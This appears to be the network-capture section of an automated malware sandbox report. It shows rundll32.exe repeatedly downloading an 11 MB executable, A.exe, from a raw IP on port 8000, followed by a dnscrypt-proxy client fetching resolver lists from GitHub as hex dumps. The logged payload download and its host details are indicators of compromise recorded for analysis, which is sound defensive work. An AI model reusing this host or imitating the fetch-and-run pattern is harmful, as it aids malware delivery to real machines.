                                                                                                                            0192.168.2.549705149.28.222.24480004688C:\Windows\System32\rundll32.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Mar 12, 2024 16:32:00.731417894 CET97OUTGET /A.exe HTTP/1.1
                                                                                                                            User-Agent: Download
                                                                                                                            Host: 149.28.222.244:8000
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Mar 12, 2024 16:32:00.886419058 CET209INHTTP/1.0 200 OK
                                                                                                                            Server: SimpleHTTP/0.6 Python/3.11.6
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:00 GMT
                                                                                                                            Content-type: application/x-msdos-program
                                                                                                                            Content-Length: 11223944
                                                                                                                            Last-Modified: Fri, 08 Mar 2024 08:21:17 GMT


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.549706149.28.222.24480003436C:\Windows\System32\rundll32.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Mar 12, 2024 16:32:00.731671095 CET97OUTGET /A.exe HTTP/1.1
                                                                                                                            User-Agent: Download
                                                                                                                            Host: 149.28.222.244:8000
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Mar 12, 2024 16:32:00.888319016 CET209INHTTP/1.0 200 OK
                                                                                                                            Server: SimpleHTTP/0.6 Python/3.11.6
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:00 GMT
                                                                                                                            Content-type: application/x-msdos-program
                                                                                                                            Content-Length: 11223944
                                                                                                                            Last-Modified: Fri, 08 Mar 2024 08:21:17 GMT


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.549707149.28.222.24480002460C:\Windows\System32\rundll32.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Mar 12, 2024 16:32:10.069346905 CET97OUTGET /A.exe HTTP/1.1
                                                                                                                            User-Agent: Download
                                                                                                                            Host: 149.28.222.244:8000
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Mar 12, 2024 16:32:10.224419117 CET209INHTTP/1.0 200 OK
                                                                                                                            Server: SimpleHTTP/0.6 Python/3.11.6
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:10 GMT
                                                                                                                            Content-type: application/x-msdos-program
                                                                                                                            Content-Length: 11223944
                                                                                                                            Last-Modified: Fri, 08 Mar 2024 08:21:17 GMT


                                                                                                                            HTTPS Proxied Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.549708185.199.109.1334437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:18 UTC162OUTGET /DNSCrypt/dnscrypt-resolvers/master/v2/public-resolvers.md HTTP/1.1
                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:32:18 UTC896INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 111847
                                                                                                                            Cache-Control: max-age=300
                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                            ETag: "63a3eb38fa723ac7d19d2572bf4e7c5e70bbea2e18f23d5e1b2950b1b7bee9e2"
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: deny
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            X-GitHub-Request-Id: 4F96:933EA:1C40693:1FD2E5F:65EED5B0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:18 GMT
                                                                                                                            Via: 1.1 varnish
                                                                                                                            X-Served-By: cache-ewr18130-EWR
                                                                                                                            X-Cache: HIT
                                                                                                                            X-Cache-Hits: 1
                                                                                                                            X-Timer: S1710257539.910961,VS0,VE1
                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                            X-Fastly-Request-ID: 3f299165fa8fc65068a57ecc7fd5f04a45d74f17
                                                                                                                            Expires: Tue, 12 Mar 2024 15:37:18 GMT
                                                                                                                            Source-Age: 246
                                                                                                                            2024-03-12 15:32:18 UTC16384INData Raw: 0a 23 20 2a 2a 2a 20 54 48 49 53 20 4c 49 53 54 20 49 53 20 46 4f 52 20 4f 4c 44 20 44 4e 53 43 52 59 50 54 2d 50 52 4f 58 59 20 56 45 52 53 49 4f 4e 53 20 2a 2a 2a 0a 0a 56 65 72 73 69 6f 6e 20 32 20 6f 66 20 74 68 65 20 6c 69 73 74 20 69 73 20 66 6f 72 20 64 6e 73 63 72 79 70 74 2d 70 72 6f 78 79 20 3c 3d 20 32 2e 30 2e 34 32 20 75 73 65 72 73 2e 0a 0a 49 66 20 79 6f 75 20 61 72 65 20 72 75 6e 6e 69 6e 67 20 75 70 2d 74 6f 2d 64 61 74 65 20 73 6f 66 74 77 61 72 65 2c 20 72 65 70 6c 61 63 65 20 60 2f 76 32 2f 60 20 77 69 74 68 20 60 2f 76 33 2f 60 20 69 6e 20 74 68 65 20 73 6f 75 72 63 65 73 20 55 52 4c 73 0a 6f 66 20 74 68 65 20 60 64 6e 73 63 72 79 70 74 2d 70 72 6f 78 79 2e 74 6f 6d 6c 60 20 66 69 6c 65 20 28 72 65 6c 65 76 61 6e 74 20 6c 69 6e 65 73
                                                                                                                            Data Ascii: # *** THIS LIST IS FOR OLD DNSCRYPT-PROXY VERSIONS ***Version 2 of the list is for dnscrypt-proxy <= 2.0.42 users.If you are running up-to-date software, replace `/v2/` with `/v3/` in the sources URLsof the `dnscrypt-proxy.toml` file (relevant lines
                                                                                                                            2024-03-12 15:32:18 UTC16384INData Raw: 6f 6c 20 61 6e 64 20 4e 6f 20 6c 6f 67 67 69 6e 67 2e 20 2d 20 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 72 6f 6c 64 2e 63 6f 6d 2f 66 72 65 65 2d 64 6e 73 0a 0a 54 68 69 73 20 44 4e 53 20 62 6c 6f 63 6b 73 20 4d 61 6c 77 61 72 65 2c 20 41 64 73 20 26 20 54 72 61 63 6b 69 6e 67 2c 20 41 64 75 6c 74 20 43 6f 6e 74 65 6e 74 20 61 6e 64 20 44 72 75 67 73 20 64 6f 6d 61 69 6e 73 2e 0a 0a 73 64 6e 73 3a 2f 2f 41 67 4d 41 41 41 41 41 41 41 41 41 43 6a 63 32 4c 6a 63 32 4c 6a 49 75 4d 54 45 41 46 47 5a 79 5a 57 56 6b 62 6e 4d 75 59 32 39 75 64 48 4a 76 62 47 51 75 59 32 39 74 42 79 39 6d 59 57 31 70 62 48 6b 0a 0a 0a 23 23 20 63 6f 6e 74 72 6f 6c 64 2d 75 6e 63 65 6e 73 6f 72 65 64 0a 0a 43 6f 6e 74 72 6f 6c 44 20 46 72 65 65 20 44 4e 53 2e 20 54 61 6b 65 20 43 4f 4e
                                                                                                                            Data Ascii: ol and No logging. - https://controld.com/free-dnsThis DNS blocks Malware, Ads & Tracking, Adult Content and Drugs domains.sdns://AgMAAAAAAAAACjc2Ljc2LjIuMTEAFGZyZWVkbnMuY29udHJvbGQuY29tBy9mYW1pbHk## controld-uncensoredControlD Free DNS. Take CON
                                                                                                                            2024-03-12 15:32:19 UTC16384INData Raw: 74 2d 54 43 59 61 62 6d 42 35 2d 59 35 4c 56 7a 59 2d 6b 43 50 54 59 44 6d 49 45 52 4f 76 57 65 37 67 5f 69 41 65 7a 6b 68 36 54 69 73 6b 58 69 34 67 72 31 51 71 74 73 52 49 78 38 45 54 50 58 77 6a 66 66 4f 45 32 52 75 63 79 35 6b 61 57 64 70 64 47 46 73 63 32 6c 36 5a 53 35 75 5a 58 51 4b 4c 32 52 75 63 79 31 78 64 57 56 79 65 51 0a 0a 0a 23 23 20 64 6e 73 2e 64 69 67 69 74 61 6c 73 69 7a 65 2e 6e 65 74 2d 69 70 76 36 0a 0a 41 20 70 75 62 6c 69 63 2c 20 6e 6f 6e 2d 74 72 61 63 6b 69 6e 67 2c 20 6e 6f 6e 2d 66 69 6c 74 65 72 69 6e 67 20 44 4e 53 20 72 65 73 6f 6c 76 65 72 20 77 69 74 68 20 44 4e 53 53 45 43 20 65 6e 61 62 6c 65 64 20 61 6e 64 20 68 6f 73 74 65 64 20 69 6e 20 47 65 72 6d 61 6e 79 20 28 68 74 74 70 73 3a 2f 2f 64 6e 73 2e 64 69 67 69 74 61
                                                                                                                            Data Ascii: t-TCYabmB5-Y5LVzY-kCPTYDmIEROvWe7g_iAezkh6TiskXi4gr1QqtsRIx8ETPXwjffOE2Rucy5kaWdpdGFsc2l6ZS5uZXQKL2Rucy1xdWVyeQ## dns.digitalsize.net-ipv6A public, non-tracking, non-filtering DNS resolver with DNSSEC enabled and hosted in Germany (https://dns.digita
                                                                                                                            2024-03-12 15:32:19 UTC16384INData Raw: 62 6e 4e 6a 63 6e 6c 77 64 43 31 6a 5a 58 4a 30 4c 6d 52 75 63 32 4e 79 65 53 35 77 64 41 0a 0a 0a 23 23 20 64 6e 73 63 72 79 2e 70 74 2d 6c 61 73 76 65 67 61 73 2d 69 70 76 36 0a 0a 44 4e 53 43 72 79 2e 70 74 20 4c 61 73 20 56 65 67 61 73 20 2d 20 44 4e 53 43 72 79 70 74 2c 20 6e 6f 20 66 69 6c 74 65 72 2c 20 6e 6f 20 6c 6f 67 73 2c 20 44 4e 53 53 45 43 20 73 75 70 70 6f 72 74 20 28 49 50 76 36 20 73 65 72 76 65 72 29 0a 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6e 73 63 72 79 2e 70 74 0a 0a 73 64 6e 73 3a 2f 2f 41 51 63 41 41 41 41 41 41 41 41 41 4a 56 73 79 4e 6a 41 31 4f 6a 59 30 4d 44 41 36 4d 6a 41 36 4d 6a 49 31 4f 44 6f 33 59 57 4e 69 4f 6a 6b 78 5a 6d 59 36 4d 6a 41 35 4f 44 70 68 4f 56 30 67 78 4f 62 57 59 6f 78 4e 39 47 30 62 65 59 35 74 61 32
                                                                                                                            Data Ascii: bnNjcnlwdC1jZXJ0LmRuc2NyeS5wdA## dnscry.pt-lasvegas-ipv6DNSCry.pt Las Vegas - DNSCrypt, no filter, no logs, DNSSEC support (IPv6 server)https://www.dnscry.ptsdns://AQcAAAAAAAAAJVsyNjA1OjY0MDA6MjA6MjI1ODo3YWNiOjkxZmY6MjA5ODphOV0gxObWYoxN9G0beY5ta2
                                                                                                                            2024-03-12 15:32:19 UTC16384INData Raw: 78 6b 79 4c 6d 52 75 63 32 4e 79 65 58 42 30 4c 57 4e 6c 63 6e 51 75 5a 47 35 7a 59 33 4a 35 4c 6e 42 30 0a 0a 0a 23 23 20 64 6e 73 63 72 79 2e 70 74 2d 74 61 6d 70 61 2d 69 70 76 34 0a 0a 44 4e 53 43 72 79 2e 70 74 20 54 61 6d 70 61 20 2d 20 44 4e 53 43 72 79 70 74 2c 20 6e 6f 20 66 69 6c 74 65 72 2c 20 6e 6f 20 6c 6f 67 73 2c 20 44 4e 53 53 45 43 20 73 75 70 70 6f 72 74 20 28 49 50 76 34 20 73 65 72 76 65 72 29 0a 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6e 73 63 72 79 2e 70 74 0a 0a 73 64 6e 73 3a 2f 2f 41 51 63 41 41 41 41 41 41 41 41 41 44 7a 45 32 4e 53 34 78 4e 44 41 75 4d 54 45 33 4c 6a 49 30 4f 43 42 66 4b 34 66 46 57 6a 57 36 35 50 52 46 33 5f 34 32 4d 5a 4d 31 4c 79 39 74 30 5a 4c 48 64 44 41 5f 30 75 79 36 33 72 6b 30 7a 42 6b 79 4c 6d 52 75
                                                                                                                            Data Ascii: xkyLmRuc2NyeXB0LWNlcnQuZG5zY3J5LnB0## dnscry.pt-tampa-ipv4DNSCry.pt Tampa - DNSCrypt, no filter, no logs, DNSSEC support (IPv4 server)https://www.dnscry.ptsdns://AQcAAAAAAAAADzE2NS4xNDAuMTE3LjI0OCBfK4fFWjW65PRF3_42MZM1Ly9t0ZLHdDA_0uy63rk0zBkyLmRu
                                                                                                                            2024-03-12 15:32:19 UTC16384INData Raw: 34 39 35 20 69 6e 20 53 77 69 74 7a 65 72 6c 61 6e 64 2e 0a 0a 73 64 6e 73 3a 2f 2f 41 51 59 41 41 41 41 41 41 41 41 41 45 7a 45 34 4e 53 34 78 4d 7a 51 75 4d 54 6b 32 4c 6a 55 30 4f 6a 67 30 4e 44 4d 67 66 73 76 76 50 69 38 42 67 44 4b 4e 59 4f 44 68 30 65 77 6a 35 4f 68 33 32 4f 6f 4a 6f 5a 4e 77 47 67 54 57 73 38 43 2d 69 2d 45 66 4d 69 35 6b 62 6e 4e 6a 63 6e 6c 77 64 43 31 6a 5a 58 4a 30 4c 6e 4a 6b 62 6e 4d 75 5a 6d 46 6c 62 47 6c 34 4c 6d 35 6c 64 41 0a 0a 0a 23 23 20 66 61 65 6c 69 78 2d 75 6b 2d 69 70 76 34 0a 0a 41 6e 20 6f 70 65 6e 20 28 6e 6f 6e 2d 6c 6f 67 67 69 6e 67 2c 20 6e 6f 6e 2d 66 69 6c 74 65 72 69 6e 67 2c 20 6e 6f 20 45 43 53 29 20 44 4e 53 43 72 79 70 74 20 72 65 73 6f 6c 76 65 72 20 6f 70 65 72 61 74 65 64 20 62 79 20 68 74 74 70
                                                                                                                            Data Ascii: 495 in Switzerland.sdns://AQYAAAAAAAAAEzE4NS4xMzQuMTk2LjU0Ojg0NDMgfsvvPi8BgDKNYODh0ewj5Oh32OoJoZNwGgTWs8C-i-EfMi5kbnNjcnlwdC1jZXJ0LnJkbnMuZmFlbGl4Lm5ldA## faelix-uk-ipv4An open (non-logging, non-filtering, no ECS) DNSCrypt resolver operated by http
                                                                                                                            2024-03-12 15:32:19 UTC13543INData Raw: 41 6b 42 72 65 54 72 76 48 51 37 4c 4d 31 49 6b 44 4b 30 62 68 5a 43 38 47 6b 32 67 77 41 53 57 4b 46 47 52 75 63 7a 45 79 4c 6e 46 31 59 57 51 35 4c 6d 35 6c 64 44 6f 31 4d 44 55 7a 43 69 39 6b 62 6e 4d 74 63 58 56 6c 63 6e 6b 0a 0a 0a 23 23 20 71 75 61 64 39 2d 64 6f 68 2d 69 70 34 2d 70 6f 72 74 35 30 35 33 2d 6e 6f 66 69 6c 74 65 72 2d 70 72 69 0a 0a 51 75 61 64 39 20 28 61 6e 79 63 61 73 74 29 20 6e 6f 2d 64 6e 73 73 65 63 2f 6e 6f 2d 6c 6f 67 2f 6e 6f 2d 66 69 6c 74 65 72 20 39 2e 39 2e 39 2e 31 30 20 2d 20 31 34 39 2e 31 31 32 2e 31 31 32 2e 31 30 0a 0a 73 64 6e 73 3a 2f 2f 41 67 59 41 41 41 41 41 41 41 41 41 43 44 6b 75 4f 53 34 35 4c 6a 45 77 49 43 6f 56 39 64 61 73 74 75 66 41 6b 42 72 65 54 72 76 48 51 37 4c 4d 31 49 6b 44 4b 30 62 68 5a 43 38
                                                                                                                            Data Ascii: AkBreTrvHQ7LM1IkDK0bhZC8Gk2gwASWKFGRuczEyLnF1YWQ5Lm5ldDo1MDUzCi9kbnMtcXVlcnk## quad9-doh-ip4-port5053-nofilter-priQuad9 (anycast) no-dnssec/no-log/no-filter 9.9.9.10 - 149.112.112.10sdns://AgYAAAAAAAAACDkuOS45LjEwICoV9dastufAkBreTrvHQ7LM1IkDK0bhZC8


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.549710185.199.109.1334437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:19 UTC170OUTGET /DNSCrypt/dnscrypt-resolvers/master/v2/public-resolvers.md.minisig HTTP/1.1
                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:32:19 UTC890INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 307
                                                                                                                            Cache-Control: max-age=300
                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                            ETag: "b1cc4b73c98b3d638e34f9b90a4c37ba3841af81b6dbce3879f1e08dacaec715"
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: deny
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            X-GitHub-Request-Id: E01A:1AAB:77011B:9375EE:65EED8BF
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:19 GMT
                                                                                                                            Via: 1.1 varnish
                                                                                                                            X-Served-By: cache-lga21959-LGA
                                                                                                                            X-Cache: HIT
                                                                                                                            X-Cache-Hits: 1
                                                                                                                            X-Timer: S1710257539.455679,VS0,VE1
                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                            X-Fastly-Request-ID: 4900bd05f4265786c02b3338a4114ac2ff9c6343
                                                                                                                            Expires: Tue, 12 Mar 2024 15:37:19 GMT
                                                                                                                            Source-Age: 257
                                                                                                                            2024-03-12 15:32:19 UTC307INData Raw: 75 6e 74 72 75 73 74 65 64 20 63 6f 6d 6d 65 6e 74 3a 20 73 69 67 6e 61 74 75 72 65 20 66 72 6f 6d 20 6d 69 6e 69 73 69 67 6e 20 73 65 63 72 65 74 20 6b 65 79 0a 52 57 51 66 36 4c 52 43 47 41 39 69 35 37 64 5a 36 68 55 37 50 53 52 73 45 74 43 32 36 44 36 53 37 4a 43 44 48 69 51 43 4b 63 69 50 61 63 6a 67 50 6c 6c 79 52 70 44 63 6d 49 58 56 43 4d 6b 6e 68 58 75 65 67 4e 38 41 34 62 52 70 45 57 2b 68 6c 4c 44 30 73 68 6f 77 79 68 63 36 57 6d 4b 4c 46 41 38 3d 0a 74 72 75 73 74 65 64 20 63 6f 6d 6d 65 6e 74 3a 20 74 69 6d 65 73 74 61 6d 70 3a 31 37 31 30 31 35 30 38 34 37 09 66 69 6c 65 3a 70 75 62 6c 69 63 2d 72 65 73 6f 6c 76 65 72 73 2e 6d 64 0a 31 35 6e 79 6e 48 6f 38 44 76 5a 53 69 6c 37 35 54 33 37 71 6a 6f 35 77 4d 57 35 76 31 31 6a 78 59 46 54 67 41
                                                                                                                            Data Ascii: untrusted comment: signature from minisign secret keyRWQf6LRCGA9i57dZ6hU7PSRsEtC26D6S7JCDHiQCKciPacjgPllyRpDcmIXVCMknhXuegN8A4bRpEW+hlLD0showyhc6WmKLFA8=trusted comment: timestamp:1710150847file:public-resolvers.md15nynHo8DvZSil75T37qjo5wMW5v11jxYFTgA


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.549712185.199.109.1334437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:19 UTC152OUTGET /DNSCrypt/dnscrypt-resolvers/master/v2/relays.md HTTP/1.1
                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:32:19 UTC891INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 37033
                                                                                                                            Cache-Control: max-age=300
                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                            ETag: "7fe46504ccd68ba694952b476a040a05a5a20c3ffbc69638a3f4ec37a969e999"
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: deny
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            X-GitHub-Request-Id: 7264:3DAF:B6E8B1:E129C3:65F02E68
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:19 GMT
                                                                                                                            Via: 1.1 varnish
                                                                                                                            X-Served-By: cache-lga21941-LGA
                                                                                                                            X-Cache: HIT
                                                                                                                            X-Cache-Hits: 1
                                                                                                                            X-Timer: S1710257540.849658,VS0,VE2
                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                            X-Fastly-Request-ID: 33a06a4baf0dab6d91f42f0581cede0982acc331
                                                                                                                            Expires: Tue, 12 Mar 2024 15:37:19 GMT
                                                                                                                            Source-Age: 22
                                                                                                                            2024-03-12 15:32:19 UTC1378INData Raw: 0a 23 20 2a 2a 2a 20 54 48 49 53 20 4c 49 53 54 20 49 53 20 46 4f 52 20 4f 4c 44 20 44 4e 53 43 52 59 50 54 2d 50 52 4f 58 59 20 56 45 52 53 49 4f 4e 53 20 2a 2a 2a 0a 0a 56 65 72 73 69 6f 6e 20 32 20 6f 66 20 74 68 65 20 6c 69 73 74 20 69 73 20 66 6f 72 20 64 6e 73 63 72 79 70 74 2d 70 72 6f 78 79 20 3c 3d 20 32 2e 30 2e 34 32 20 75 73 65 72 73 2e 0a 0a 49 66 20 79 6f 75 20 61 72 65 20 72 75 6e 6e 69 6e 67 20 75 70 2d 74 6f 2d 64 61 74 65 20 73 6f 66 74 77 61 72 65 2c 20 72 65 70 6c 61 63 65 20 60 2f 76 32 2f 60 20 77 69 74 68 20 60 2f 76 33 2f 60 20 69 6e 20 74 68 65 20 73 6f 75 72 63 65 73 20 55 52 4c 73 0a 6f 66 20 74 68 65 20 60 64 6e 73 63 72 79 70 74 2d 70 72 6f 78 79 2e 74 6f 6d 6c 60 20 66 69 6c 65 20 28 72 65 6c 65 76 61 6e 74 20 6c 69 6e 65 73
                                                                                                                            Data Ascii: # *** THIS LIST IS FOR OLD DNSCRYPT-PROXY VERSIONS ***Version 2 of the list is for dnscrypt-proxy <= 2.0.42 users.If you are running up-to-date software, replace `/v2/` with `/v3/` in the sources URLsof the `dnscrypt-proxy.toml` file (relevant lines
                                                                                                                            2024-03-12 15:32:19 UTC1378INData Raw: 76 65 72 20 70 72 6f 76 69 64 65 64 20 62 79 20 68 74 74 70 73 3a 2f 2f 63 72 79 70 74 6f 73 74 6f 72 6d 2e 69 73 2f 0a 0a 73 64 6e 73 3a 2f 2f 67 52 49 7a 4e 79 34 78 4d 6a 41 75 4d 54 55 79 4c 6a 49 7a 4e 54 6f 30 4e 44 4d 0a 0a 0a 23 23 20 61 6e 6f 6e 2d 63 73 2d 63 68 0a 0a 53 77 69 74 7a 65 72 6c 61 6e 64 20 41 6e 6f 6e 79 6d 69 7a 65 64 20 44 4e 53 20 72 65 6c 61 79 20 73 65 72 76 65 72 20 70 72 6f 76 69 64 65 64 20 62 79 20 68 74 74 70 73 3a 2f 2f 63 72 79 70 74 6f 73 74 6f 72 6d 2e 69 73 2f 0a 0a 73 64 6e 73 3a 2f 2f 67 52 4d 78 4f 54 41 75 4d 6a 45 78 4c 6a 49 31 4e 53 34 79 4d 6a 63 36 4e 44 51 7a 0a 0a 0a 23 23 20 61 6e 6f 6e 2d 63 73 2d 63 68 32 0a 0a 53 77 69 74 7a 65 72 6c 61 6e 64 20 32 20 41 6e 6f 6e 79 6d 69 7a 65 64 20 44 4e 53 20 72 65
                                                                                                                            Data Ascii: ver provided by https://cryptostorm.is/sdns://gRIzNy4xMjAuMTUyLjIzNTo0NDM## anon-cs-chSwitzerland Anonymized DNS relay server provided by https://cryptostorm.is/sdns://gRMxOTAuMjExLjI1NS4yMjc6NDQz## anon-cs-ch2Switzerland 2 Anonymized DNS re
                                                                                                                            2024-03-12 15:32:19 UTC1378INData Raw: 74 70 73 3a 2f 2f 63 72 79 70 74 6f 73 74 6f 72 6d 2e 69 73 2f 0a 0a 73 64 6e 73 3a 2f 2f 67 52 49 34 4e 53 34 78 4d 54 51 75 4d 54 4d 34 4c 6a 45 78 4f 54 6f 30 4e 44 4d 0a 0a 0a 23 23 20 61 6e 6f 6e 2d 63 73 2d 66 69 6e 6c 61 6e 64 0a 0a 46 69 6e 6c 61 6e 64 20 41 6e 6f 6e 79 6d 69 7a 65 64 20 44 4e 53 20 72 65 6c 61 79 20 73 65 72 76 65 72 20 70 72 6f 76 69 64 65 64 20 62 79 20 68 74 74 70 73 3a 2f 2f 63 72 79 70 74 6f 73 74 6f 72 6d 2e 69 73 2f 0a 0a 73 64 6e 73 3a 2f 2f 67 52 49 78 4f 44 55 75 4d 54 45 33 4c 6a 45 78 4f 43 34 79 4d 44 6f 30 4e 44 4d 0a 0a 0a 23 23 20 61 6e 6f 6e 2d 63 73 2d 66 6c 0a 0a 55 53 20 2d 20 4d 69 61 6d 69 2c 20 46 4c 20 41 6e 6f 6e 79 6d 69 7a 65 64 20 44 4e 53 20 72 65 6c 61 79 20 73 65 72 76 65 72 20 70 72 6f 76 69 64 65
                                                                                                                            Data Ascii: tps://cryptostorm.is/sdns://gRI4NS4xMTQuMTM4LjExOTo0NDM## anon-cs-finlandFinland Anonymized DNS relay server provided by https://cryptostorm.is/sdns://gRIxODUuMTE3LjExOC4yMDo0NDM## anon-cs-flUS - Miami, FL Anonymized DNS relay server provide
                                                                                                                            2024-03-12 15:32:19 UTC1378INData Raw: 0a 0a 23 23 20 61 6e 6f 6e 2d 63 73 2d 6c 61 0a 0a 55 53 20 2d 20 4c 6f 73 20 41 6e 67 65 6c 65 73 2c 20 43 41 20 41 6e 6f 6e 79 6d 69 7a 65 64 20 44 4e 53 20 72 65 6c 61 79 20 73 65 72 76 65 72 20 70 72 6f 76 69 64 65 64 20 62 79 20 68 74 74 70 73 3a 2f 2f 63 72 79 70 74 6f 73 74 6f 72 6d 2e 69 73 2f 0a 0a 73 64 6e 73 3a 2f 2f 67 52 4d 78 4f 54 55 75 4d 6a 41 32 4c 6a 45 77 4e 43 34 79 4d 44 4d 36 4e 44 51 7a 0a 0a 0a 23 23 20 61 6e 6f 6e 2d 63 73 2d 6c 6f 6e 64 6f 6e 0a 0a 4c 6f 6e 64 6f 6e 2c 20 45 6e 67 6c 61 6e 64 20 41 6e 6f 6e 79 6d 69 7a 65 64 20 44 4e 53 20 72 65 6c 61 79 20 73 65 72 76 65 72 20 70 72 6f 76 69 64 65 64 20 62 79 20 68 74 74 70 73 3a 2f 2f 63 72 79 70 74 6f 73 74 6f 72 6d 2e 69 73 2f 0a 0a 73 64 6e 73 3a 2f 2f 67 52 45 33 4f 43 34
                                                                                                                            Data Ascii: ## anon-cs-laUS - Los Angeles, CA Anonymized DNS relay server provided by https://cryptostorm.is/sdns://gRMxOTUuMjA2LjEwNC4yMDM6NDQz## anon-cs-londonLondon, England Anonymized DNS relay server provided by https://cryptostorm.is/sdns://gRE3OC4
                                                                                                                            2024-03-12 15:32:19 UTC1378INData Raw: 6f 6e 79 6d 69 7a 65 64 20 44 4e 53 20 72 65 6c 61 79 20 73 65 72 76 65 72 20 70 72 6f 76 69 64 65 64 20 62 79 20 68 74 74 70 73 3a 2f 2f 63 72 79 70 74 6f 73 74 6f 72 6d 2e 69 73 2f 0a 0a 73 64 6e 73 3a 2f 2f 67 52 49 78 4d 44 67 75 4d 54 67 78 4c 6a 45 79 4e 43 34 79 4e 7a 6f 30 4e 44 4d 0a 0a 0a 23 23 20 61 6e 6f 6e 2d 63 73 2d 6e 6f 72 77 61 79 0a 0a 4f 73 6c 6f 2c 20 4e 6f 72 77 61 79 20 41 6e 6f 6e 79 6d 69 7a 65 64 20 44 4e 53 20 72 65 6c 61 79 20 73 65 72 76 65 72 20 70 72 6f 76 69 64 65 64 20 62 79 20 68 74 74 70 73 3a 2f 2f 63 72 79 70 74 6f 73 74 6f 72 6d 2e 69 73 2f 0a 0a 73 64 6e 73 3a 2f 2f 67 52 49 35 4d 53 34 79 4d 54 6b 75 4d 6a 45 31 4c 6a 49 79 4e 7a 6f 30 4e 44 4d 0a 0a 0a 23 23 20 61 6e 6f 6e 2d 63 73 2d 6e 76 0a 0a 55 53 20 2d 20 4c
                                                                                                                            Data Ascii: onymized DNS relay server provided by https://cryptostorm.is/sdns://gRIxMDguMTgxLjEyNC4yNzo0NDM## anon-cs-norwayOslo, Norway Anonymized DNS relay server provided by https://cryptostorm.is/sdns://gRI5MS4yMTkuMjE1LjIyNzo0NDM## anon-cs-nvUS - L
